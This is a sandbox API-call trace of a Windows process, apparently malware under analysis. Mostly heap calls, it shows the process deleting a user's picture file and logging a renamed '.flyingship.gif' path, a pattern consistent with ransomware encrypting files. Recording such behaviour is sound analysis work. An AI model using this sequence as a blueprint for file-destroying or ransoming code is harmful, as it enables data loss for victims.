[0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.560] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.561] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.561] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.562] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.562] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.563] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.563] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", lpFilePart=0x0) returned 0x38 [0188.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x159d5fa0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 0x90af58 [0188.564] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cczf5rk8bht5t.gif")) returned 1 [0188.568] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0x159d5fa0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 0 [0188.568] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0188.572] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0188.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0188.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.573] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.573] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.573] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.573] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.573] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0188.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.574] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2a59, lpOverlapped=0x0) returned 1 [0188.574] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2a59, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0188.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0188.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0188.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x46) returned 0x9aa548 [0188.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\n", cchWideChar=70, lpMultiByteStr=0x9aa548, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 70 [0188.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0188.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0188.575] WriteFile (in: hFile=0x158, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x45, lpOverlapped=0x0) returned 1 [0188.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.575] CloseHandle (hObject=0x158) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.576] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0188.577] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0188.577] 